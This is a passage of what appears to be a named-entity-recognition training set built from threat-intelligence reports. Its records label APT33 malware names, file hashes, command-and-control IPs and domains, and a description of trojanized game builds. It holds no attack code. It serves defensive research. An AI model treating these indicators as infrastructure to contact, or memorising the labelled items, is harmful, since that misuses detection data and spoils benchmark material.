"Indicator: menu\\programs\\startup\\smss.exe": [[238, 268]]}, "info": {"id": "aptner_train_000596", "source": "aptner_train"}} {"text": "This was quickly followed 15 seconds later by the installation of a credential dumping to csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe , and the execution of powershell commands via PowerShell Empire , a freely available post-exploitation framework , to bypass logging on the infected machine .", "spans": {"Indicator: csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe": [[90, 151]], "System: powershell": [[175, 185]], "System: PowerShell Empire": [[199, 216]]}, "info": {"id": "aptner_train_000597", "source": "aptner_train"}} {"text": "Activity continued throughout April where additional versions of DarkComet , POSHC2 implants , and an AutoIt backdoor were deployed along with further credential dumping activities .", "spans": {"Malware: DarkComet": [[65, 74]], "Malware: POSHC2": [[77, 83]], "Malware: AutoIt backdoor": [[102, 117]]}, "info": {"id": "aptner_train_000598", "source": "aptner_train"}} {"text": "Elfin is one of the most active groups currently operating in the Middle East , targeting a large number of organizations across a diverse range of sectors .", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000599", "source": "aptner_train"}} {"text": "Over the past three years , the group has utilized a wide array of tools against its victims , ranging from custom built malware to off-the-shelf RATs , indicating a willingness to continually revise its tactics and find whatever tools it takes to compromise its next set of victims .", "spans": {}, "info": {"id": "aptner_train_000600", "source": "aptner_train"}} {"text": "Symantec has the following protection in place to protect customers against these attacks , APT33 : Backdoor.Notestuk Trojan.Stonedrill Backdoor.Remvio Backdoor.Breut Trojan.Quasar Backdoor.Patpoopy Trojan.Nancrat Trojan.Netweird.B Exp.CVE-2018-20250 
SecurityRisk.LaZagne Hacktool.Mimikatz SniffPass .", "spans": {"Organization: APT33": [[92, 97]], "Malware: Backdoor.Notestuk": [[100, 117]], "Malware: Trojan.Stonedrill": [[118, 135]], "Malware: Backdoor.Remvio": [[136, 151]], "Malware: Backdoor.Breut": [[152, 166]], "Malware: Trojan.Quasar": [[167, 180]], "Malware: Backdoor.Patpoopy": [[181, 198]], "Malware: Trojan.Nancrat": [[199, 213]], "Malware: Trojan.Netweird.B": [[214, 231]], "Vulnerability: Exp.CVE-2018-20250": [[232, 250]], "Malware: SecurityRisk.LaZagne": [[251, 271]], "Malware: Hacktool.Mimikatz": [[272, 289]], "Malware: SniffPass": [[290, 299]]}, "info": {"id": "aptner_train_000601", "source": "aptner_train"}} {"text": "APT33 : 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f": [[8, 72]]}, "info": {"id": "aptner_train_000602", "source": "aptner_train"}} {"text": "APT33 : a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 backdoor .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449": [[8, 72]]}, "info": {"id": "aptner_train_000603", "source": "aptner_train"}} {"text": "APT33 : f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5": [[8, 72]]}, "info": {"id": "aptner_train_000604", "source": "aptner_train"}} {"text": "APT33 : 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586": [[8, 72]]}, "info": {"id": "aptner_train_000605", "source": "aptner_train"}} {"text": "APT33 : 709df1bbd0a5b15e8f205b2854204e8caf63f78203e3b595e0e66c918ec23951 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 
709df1bbd0a5b15e8f205b2854204e8caf63f78203e3b595e0e66c918ec23951": [[8, 72]]}, "info": {"id": "aptner_train_000606", "source": "aptner_train"}} {"text": "APT33 : a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 RAT .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0": [[8, 72]]}, "info": {"id": "aptner_train_000607", "source": "aptner_train"}} {"text": "APT33 : 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d RAT .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d": [[8, 72]]}, "info": {"id": "aptner_train_000608", "source": "aptner_train"}} {"text": "APT33 : d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 RAT .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0": [[8, 72]]}, "info": {"id": "aptner_train_000609", "source": "aptner_train"}} {"text": "APT33 : ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565": [[8, 72]]}, "info": {"id": "aptner_train_000610", "source": "aptner_train"}} {"text": "APT33 : e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70": [[8, 72]]}, "info": {"id": "aptner_train_000611", "source": "aptner_train"}} {"text": "APT33 : 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c": [[8, 72]]}, "info": {"id": "aptner_train_000612", "source": "aptner_train"}} {"text": "APT33 : 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 .", "spans": {"Organization: APT33": [[0, 
5]], "Indicator: 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330": [[8, 72]]}, "info": {"id": "aptner_train_000613", "source": "aptner_train"}} {"text": "APT33 : ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3": [[8, 72]]}, "info": {"id": "aptner_train_000614", "source": "aptner_train"}} {"text": "APT33 : 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18": [[8, 72]]}, "info": {"id": "aptner_train_000615", "source": "aptner_train"}} {"text": "APT33 : bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab": [[8, 72]]}, "info": {"id": "aptner_train_000616", "source": "aptner_train"}} {"text": "APT33 : af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3": [[8, 72]]}, "info": {"id": "aptner_train_000617", "source": "aptner_train"}} {"text": "APT33 : c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b FTP tool .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b": [[8, 72]]}, "info": {"id": "aptner_train_000618", "source": "aptner_train"}} {"text": "APT33 : 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 FTP tool .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8": [[8, 72]]}, "info": {"id": "aptner_train_000619", "source": "aptner_train"}} {"text": "APT33 : 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 downloader ( 
registry.ps1 ) .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997": [[8, 72]], "Malware: registry.ps1": [[86, 98]]}, "info": {"id": "aptner_train_000620", "source": "aptner_train"}} {"text": "APT33 : dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 backdoor .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40": [[8, 72]]}, "info": {"id": "aptner_train_000621", "source": "aptner_train"}} {"text": "APT33 : 95.211.191.117 update-sec.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 95.211.191.117": [[8, 22]], "Indicator: update-sec.com": [[23, 37]]}, "info": {"id": "aptner_train_000622", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.120 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: mynetwork.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000623", "source": "aptner_train"}} {"text": "APT33 : 162.250.145.234 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 162.250.145.234": [[8, 23]], "Indicator: mynetwork.ddns.net": [[24, 42]]}, "info": {"id": "aptner_train_000624", "source": "aptner_train"}} {"text": "APT33 : 91.235.142.76 mywinnetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.235.142.76": [[8, 21]], "Indicator: mywinnetwork.ddns.net": [[22, 43]]}, "info": {"id": "aptner_train_000625", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.119 hyperservice.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.119": [[8, 19]], "Indicator: hyperservice.ddns.net": [[20, 41]]}, "info": {"id": "aptner_train_000626", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.120 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": 
"aptner_train_000627", "source": "aptner_train"}} {"text": "APT33 : 213.252.244.14 service-avant.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 213.252.244.14": [[8, 22]], "Indicator: service-avant.com": [[23, 40]]}, "info": {"id": "aptner_train_000628", "source": "aptner_train"}} {"text": "APT33 : 91.235.142.124 mywinnetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.235.142.124": [[8, 22]], "Indicator: mywinnetwork.ddns.net": [[23, 44]]}, "info": {"id": "aptner_train_000629", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.120 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: mynetwork.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000630", "source": "aptner_train"}} {"text": "APT33 : 162.250.145.234 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 162.250.145.234": [[8, 23]], "Indicator: mynetwork.ddns.net": [[24, 42]]}, "info": {"id": "aptner_train_000631", "source": "aptner_train"}} {"text": "APT33 : 91.235.142.76 mywinnetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.235.142.76": [[8, 21]], "Indicator: mywinnetwork.ddns.net": [[22, 43]]}, "info": {"id": "aptner_train_000632", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.120 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000633", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.120 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000634", "source": "aptner_train"}} {"text": "APT33 : 95.211.191.117 update-sec.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 95.211.191.117": [[8, 22]], "Indicator: update-sec.com": [[23, 37]]}, "info": {"id": 
"aptner_train_000635", "source": "aptner_train"}} {"text": "APT33 : 5.187.21.70 microsoftupdated.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5.187.21.70": [[8, 19]], "Indicator: microsoftupdated.com": [[20, 40]]}, "info": {"id": "aptner_train_000636", "source": "aptner_train"}} {"text": "APT33 : 217.13.103.46 securityupdated.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 217.13.103.46": [[8, 21]], "Indicator: securityupdated.com": [[22, 41]]}, "info": {"id": "aptner_train_000637", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.120 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000638", "source": "aptner_train"}} {"text": "APT33 : 5.187.21.71 backupnet.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5.187.21.71": [[8, 19]], "Indicator: backupnet.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000639", "source": "aptner_train"}} {"text": "APT33 : 91.230.121.143 backupnet.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.230.121.143": [[8, 22]], "Indicator: backupnet.ddns.net": [[23, 41]]}, "info": {"id": "aptner_train_000640", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.119 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.119": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000641", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.117 srvhost.servehttp.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.117": [[8, 19]], "Indicator: srvhost.servehttp.com": [[20, 41]]}, "info": {"id": "aptner_train_000642", "source": "aptner_train"}} {"text": "APT33 : 37.48.105.178 servhost.hopto.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 37.48.105.178": [[8, 21]], "Indicator: servhost.hopto.org": [[22, 40]]}, "info": {"id": 
"aptner_train_000643", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.117 srvhost.servehttp.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.117": [[8, 19]], "Indicator: srvhost.servehttp.com": [[20, 41]]}, "info": {"id": "aptner_train_000644", "source": "aptner_train"}} {"text": "APT33 : 5.187.21.70 microsoftupdated.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5.187.21.70": [[8, 19]], "Indicator: microsoftupdated.com": [[20, 40]]}, "info": {"id": "aptner_train_000645", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.214 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000646", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.217 [REDACTED].servehttp.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].servehttp.com": [[22, 46]]}, "info": {"id": "aptner_train_000647", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.214 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000648", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.214 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000649", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.214 [REDACTED].sytes.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: [REDACTED].sytes.net": [[22, 42]]}, "info": {"id": "aptner_train_000650", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.217 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, 
"info": {"id": "aptner_train_000651", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.216 srvhost.servehttp.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.216": [[8, 21]], "Indicator: srvhost.servehttp.com": [[22, 43]]}, "info": {"id": "aptner_train_000652", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.217 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000653", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.217 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000654", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.215 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.215": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000655", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.217 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000656", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.216 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.216": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000657", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.232 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.232": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000658", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.214 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: [REDACTED].ddns.net": 
[[22, 41]]}, "info": {"id": "aptner_train_000659", "source": "aptner_train"}} {"text": "APT33 : 162.250.145.204 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 162.250.145.204": [[8, 23]], "Indicator: mynetwork.ddns.net": [[24, 42]]}, "info": {"id": "aptner_train_000660", "source": "aptner_train"}} {"text": "APT33 : 188.165.4.81 svcexplores.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 188.165.4.81": [[8, 20]], "Indicator: svcexplores.com": [[21, 36]]}, "info": {"id": "aptner_train_000661", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.231 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.231": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000662", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.231 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.231": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000663", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.232 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.232": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000664", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.216 [REDACTED].myftp.biz .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.216": [[8, 21]], "Indicator: [REDACTED].myftp.biz": [[22, 42]]}, "info": {"id": "aptner_train_000665", "source": "aptner_train"}} {"text": "APT33 : 91.230.121.143 remote-server.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.230.121.143": [[8, 22]], "Indicator: remote-server.ddns.net": [[23, 45]]}, "info": {"id": "aptner_train_000666", "source": "aptner_train"}} {"text": "APT33 : 162.250.145.222 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 162.250.145.222": [[8, 23]], "Indicator: 
[REDACTED].ddns.net": [[24, 43]]}, "info": {"id": "aptner_train_000667", "source": "aptner_train"}} {"text": "APT33 : 64.251.19.216 [REDACTED].redirectme.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.216": [[8, 21]], "Indicator: [REDACTED].redirectme.net": [[22, 47]]}, "info": {"id": "aptner_train_000668", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.222 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.222": [[8, 19]], "Indicator: mynetwork.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000669", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.223 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.223": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000670", "source": "aptner_train"}} {"text": "APT33 : 217.147.168.44 remserver.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 217.147.168.44": [[8, 22]], "Indicator: remserver.ddns.net": [[23, 41]]}, "info": {"id": "aptner_train_000671", "source": "aptner_train"}} {"text": "APT33 : 195.20.52.172 mynetwork.cf .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 195.20.52.172": [[8, 21]], "Indicator: mynetwork.cf": [[22, 34]]}, "info": {"id": "aptner_train_000672", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.221 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.221": [[8, 19]], "Indicator: mynetwork.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000673", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.220 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.220": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000674", "source": "aptner_train"}} {"text": "APT33 : 8.26.21.221 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.221": [[8, 19]], "Indicator: [REDACTED].ddns.net": 
[[20, 39]]}, "info": {"id": "aptner_train_000675", "source": "aptner_train"}} {"text": "APT33 : 91.230.121.144 remserver.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.230.121.144": [[8, 22]], "Indicator: remserver.ddns.net": [[23, 41]]}, "info": {"id": "aptner_train_000676", "source": "aptner_train"}} {"text": "APT33 : 89.34.237.118 mywinnetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 89.34.237.118": [[8, 21]], "Indicator: mywinnetwork.ddns.net": [[22, 43]]}, "info": {"id": "aptner_train_000677", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.35 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.35": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000678", "source": "aptner_train"}} {"text": "APT33 : 5.79.127.177 mypsh.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5.79.127.177": [[8, 20]], "Indicator: mypsh.ddns.net": [[21, 35]]}, "info": {"id": "aptner_train_000679", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.35 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.35": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000680", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.35 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.35": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000681", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.35 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.35": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000682", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.36 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.36": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 
41]]}, "info": {"id": "aptner_train_000683", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.37 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.37": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000684", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.38 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.38": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000685", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.39 remote-server.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.39": [[8, 21]], "Indicator: remote-server.ddns.net": [[22, 44]]}, "info": {"id": "aptner_train_000686", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.40 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.40": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000687", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.41 mynetwork.cf .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.41": [[8, 21]], "Indicator: mynetwork.cf": [[22, 34]]}, "info": {"id": "aptner_train_000688", "source": "aptner_train"}} {"text": "APT33 : 192.119.15.42 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.42": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000689", "source": "aptner_train"}} {"text": "gaming industry scope attackers asia .", "spans": {}, "info": {"id": "aptner_train_000690", "source": "aptner_train"}} {"text": "This is not the first time the gaming industry has been targeted by attackers who compromise game developers , insert backdoors into a game’s build environment , and then have their malware distributed as legitimate software .", "spans": {}, "info": {"id": "aptner_train_000691", "source": 
"aptner_train"}} {"text": "This time , two games and one gaming platform application were compromised to include a backdoor .", "spans": {}, "info": {"id": "aptner_train_000695", "source": "aptner_train"}} {"text": "Although the malware uses different configurations in each case , the three affected software products included the same backdoor code and were launched using the same mechanism .", "spans": {}, "info": {"id": "aptner_train_000697", "source": "aptner_train"}} {"text": "While two of the compromised products no longer include the backdoor , one of the affected developers is still distributing the trojanized version : ironically , the game is named Infestation , and is produced by Thai developer Electronics Extreme .", "spans": {"Organization: Electronics Extreme": [[228, 247]]}, "info": {"id": "aptner_train_000698", "source": "aptner_train"}} {"text": "We have tried informing them several times , through various channels , since early February , but without apparent success .", "spans": {}, "info": {"id": "aptner_train_000699", "source": "aptner_train"}} {"text": "Let’s look at how the malicious payload is embedded and then look into the details of the backdoor itself .", "spans": {}, "info": {"id": "aptner_train_000700", "source": "aptner_train"}} {"text": "The payload code is started very early during the execution of the backdoored executable file .", "spans": {}, "info": {"id": "aptner_train_000701", "source": "aptner_train"}} {"text": "Right after the PE entry point , the standard call to the C Runtime initialization ( __scrt_common_main_seh ) is hooked to launch the malicious payload before everything else .", "spans": {"System: __scrt_common_main_seh": [[85, 107]]}, "info": {"id": "aptner_train_000702", "source": "aptner_train"}} {"text": "This may suggest that the malefactor changed a build configuration rather than the source code itself .", "spans": {}, "info": {"id": "aptner_train_000703", "source": "aptner_train"}} {"text": "The code added to 
the executable decrypts and launches the backdoor in-memory before resuming normal execution of the C Runtime initialization code and all the subsequent code of the host application .", "spans": {}, "info": {"id": "aptner_train_000704", "source": "aptner_train"}} {"text": "The embedded payload data has a specific structure , that is parsed by the added unpacking code .", "spans": {}, "info": {"id": "aptner_train_000705", "source": "aptner_train"}} {"text": "It includes an RC4 key ( which is XORed with 0x37 ) that is used to decrypt a filename and the embedded DLL file .", "spans": {"System: RC4 key": [[15, 22]], "System: XORed with 0x37": [[34, 49]], "System: DLL": [[104, 107]]}, "info": {"id": "aptner_train_000706", "source": "aptner_train"}} {"text": "The actual malicious payload is quite small and only contains about 17 KB of code and data .", "spans": {}, "info": {"id": "aptner_train_000707", "source": "aptner_train"}} {"text": "The configuration data is simply a whitespace-separated list of strings .", "spans": {}, "info": {"id": "aptner_train_000708", "source": "aptner_train"}} {"text": "The 